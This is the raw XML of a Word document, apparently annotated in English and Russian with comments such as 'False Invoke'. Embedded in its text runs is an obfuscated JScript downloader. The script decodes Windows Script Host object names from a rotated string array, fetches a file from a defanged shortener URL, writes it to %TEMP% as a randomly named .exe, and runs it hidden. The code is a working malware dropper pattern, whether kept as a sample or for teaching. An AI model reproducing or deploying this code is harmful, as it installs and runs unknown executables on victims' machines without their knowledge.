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pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var _0x22fa1f = _initial_launchFunc;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(function(_0x4f7733, _0x9ac3d3) {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var _0x364b15 = _initial_launchFunc,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_0x54d738 = _0x4f7733();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while (!![]) {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try {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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">var _0x3db72c = parseInt(_0x364b15(495)) / 1 * (parseInt(_0x364b15(485)) / 0x2) + parseInt(_0x364b15(499)) / 3 * (parseInt(_0x364b15(505)) / 4) + -parseInt(_0x364b15(496)) / 5 * (parseInt(_0x364b15(500)) / 6) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ parseInt(_0x364b15(502)) / 7 * (-parseInt(_0x364b15(489)) / 8) + -parseInt(_0x364b15(503)) / 9 * (-parseInt(_0x364b15(493)) / 10) + -parseInt(_0x364b15(515)) / 11 + -parseInt(_0x364b15(488)) / 12 * (parseInt(_0x364b15(512)) / 13);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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">if (_0x3db72c === _0x9ac3d3) break;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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">else _0x54d738['push'](_0x54d738['shift']());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} catch (_0x31c89a) {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    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">_0x54d738['push'](_0x54d738['shift']());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}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}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}(_StoreMaliciousCommands, 0x7bbe1));</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr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function _StoreMaliciousCommands() {</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">var _0x44cf17 = ['161388RPSeXo', '%TEMP%', '.exe', '492TCvoTF', '10472DzuRbO', 'MSXML2.XMLHTTP', 'Scripting.FileSystemObject', 'open', '2591450LelUFW', 'Open', '11DdyEIT', '143705KPLLVg', 'P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">osition', 'CreateObject', '811974EpasyL', '12YWhdLu', 'ExpandEnvironmentStrings', '161niwgeO', '9momQLi', 'send', '4jtkQWe', 'WScript.Shell', 'substring', 'Close', 'random', 'Write', 'ResponseBody', '70239FHGPwr', 'status', 'Type', '6616236zGcHfF', 'Run'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_0x44cf17;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US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False Invoke </w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false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Ложный вызов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">поддельная вложенность</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r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_StoreMaliciousCommands = function() {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return _0x44cf17;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};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return _StoreMaliciousCommands();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}</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr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function _initial_launchFunc(_0x2cd2a4, _0x105e15) {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var _StoreMaliciousCommandse9 = _StoreMaliciousCommands();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return _initial_launchFunc = function(_initial_launchFunc***ec, _0x3f4979) {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_initial_launchFuncec = _initial_launchFunc***ec - 485;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var _0x5d8691 = _StoreMaliciousCommandse9[_initial_launchFunc***ec];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return _0x5d8691;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}, _initial_launchFunc(_0x2cd2a4, _0x105e15);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}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try {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var shell = WScript['CreateObject'](_0x22fa1f(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">506</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)),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fso = WScript[_0x22fa1f(498)](_0x22fa1f(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">491</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)),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tempFolder = shell[_0x22fa1f(501)](_0x22fa1f(486)),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randomName = Math[_0x22fa1f(509)]()['toString'](36)[_0x22fa1f(507)](2, 10) + _0x22fa1f(487),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filePath = tempFolder + '\x5c' + randomName,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fileUrl = 'https://u[.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]to//6AgGIg',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xhr = WScript[_0x22fa1f(498)](_0x22fa1f(490));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xhr[_0x22fa1f(492)]('GET', fileUrl, ![]), xhr[_0x22fa1f(504)]();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if (xhr[_0x22fa1f(513)] === 200) {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var stream = WScript[_0x22fa1f(498)]('ADODB.Stream');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 xml:space="preserve">    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">stream[_0x22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fa1f(494)](), stream[_0x22fa1f(514)] = 0x1, stream[_0x22fa1f(510)](xhr[_0x22fa1f(511)]), stream[_0x22fa1f(497)] = 0x0, stream['SaveToFile'](filePath, 2), stream[_0x22fa1f(508)](), shell[_0x22fa1f(516)]('”' + filePath + '”', 0, ![]);</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="false"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">}</w:t>
      </w:r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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">} catch (_0x5584ac) {}</w:t>
      </w:r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9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7"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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3"/>
    <w:next w:val="893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numbering" w:styleId="844" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="845">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="843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3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3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3"/>
    <w:link w:val="8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3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3"/>
    <w:link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Title Char"/>
    <w:basedOn w:val="843"/>
    <w:link w:val="9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Subtitle Char"/>
    <w:basedOn w:val="843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3"/>
    <w:next w:val="893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3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3"/>
    <w:next w:val="893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43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3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3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3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3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4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5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6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7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8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9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90">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760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pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="894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Heading 1"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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896">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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897">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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898">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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899">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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00">
    <w:name w:val="Heading 6"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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901">
    <w:name w:val="Title"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="893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902">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="893"/>
    <w:next w:val="89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2025-04-26T11:11:35Z</dcterms:modified>
</cp:coreProperties>
</file>